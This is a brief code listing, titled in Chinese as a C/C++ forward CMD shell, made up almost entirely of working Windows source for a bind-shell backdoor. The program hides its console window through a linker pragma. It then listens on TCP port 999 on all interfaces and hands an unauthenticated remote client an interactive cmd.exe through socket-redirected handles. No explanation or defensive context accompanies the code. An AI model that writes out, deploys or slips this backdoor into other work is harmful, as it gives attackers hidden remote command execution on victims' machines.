C/C++ 实现正向CMDShell

#pragma comment(lib,"ws2_32.lib")


#ifdef _MSC_VER
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
#endif

#include <winsock2.h>
#include <windows.h>
#define Port 999


int main()
{
    SOCKET sSocket,cSocket;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    WSADATA wsaData;
    sockaddr_in sSockaddr;
    char szCmdPath[MAX_PATH];
 
    GetEnvironmentVariable("COMSPEC",szCmdPath,MAX_PATH);
    ZeroMemory(&wsaData,sizeof(wsaData));
    ZeroMemory(&si,sizeof(STARTUPINFO));
    ZeroMemory(&pi,sizeof(PROCESS_INFORMATION));
    
    WSAStartup(0x0202,&wsaData);
    cSocket=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
    sSockaddr.sin_addr.s_addr=INADDR_ANY;
    sSockaddr.sin_family=AF_INET;
    sSockaddr.sin_port=htons(Port);
    bind(cSocket,(sockaddr*)&sSockaddr,sizeof(sSockaddr));
    listen(cSocket,1);

    int sLen=sizeof(sSockaddr);
    sSocket=accept(cSocket,(sockaddr*)&sSockaddr,&sLen);
    si.cb=sizeof(si);
    si.dwFlags=STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
    si.hStdInput=(HANDLE)sSocket;
    si.hStdOutput=(HANDLE)sSocket;
    si.hStdError=(HANDLE)sSocket;
    CreateProcess(NULL,szCmdPath,NULL,NULL,TRUE,0,NULL,NULL,&si,&pi);
    WaitForSingleObject(pi.hProcess,INFINITE);
    
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    closesocket(cSocket);
    closesocket(sSocket);
    WSACleanup();

    return 0;
}